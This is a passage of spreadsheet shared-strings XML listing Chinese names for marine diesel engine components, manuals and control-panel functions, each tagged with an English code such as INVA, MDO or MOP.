    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>IMO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INFI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INFI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑翔机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INFI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INFI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀体密封空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑翔机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接组</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>INVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>KEF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>KLK</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器插芯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Lambda</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>LCD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>L-GB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>L-GB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头质量控制说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>LIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>LKS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>LKS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组装图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>LKV-LKW</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>LLK</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>LTC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>LT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>LT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>L</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形销规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>M.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>头再加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Maihak</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功器用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MAN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MAN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水洗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MAS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MC,S34MNV</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接曲轴质量规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">MC/MC-C - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MC/MC-C-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作标准手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MCR-HFO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运转能力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MCR-MDO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运转能力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">MC-S - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作标准手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">MC-S - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MC-S</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型主机燃油操作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MC-S</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承负荷测量生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电器板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">MDO </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MDO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MDO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MDO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ＭＤＯ－燃油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MDO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护，大修期</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MDO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护，日常</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MDO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ME </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟器说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ME/-C,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>故障检测</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统泄漏</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ME/ME-C-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作标准手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ME-B </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟器说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ME-B</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型液压系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MEB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型操作手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ME-ECS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试软件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ME-ECS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MEG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>感应传感器质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器液位开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型操作手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机模拟器装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MHP_E-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MHP_P</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄面板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MIKRO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MIP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MIP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装置用孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MIP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>准备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>描述</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>版本</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>概览</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进程信息</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警报处理装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警报清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平均有效压力</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-ME-B</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸负荷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设定时间</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>事件日志</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动切断清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通道清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
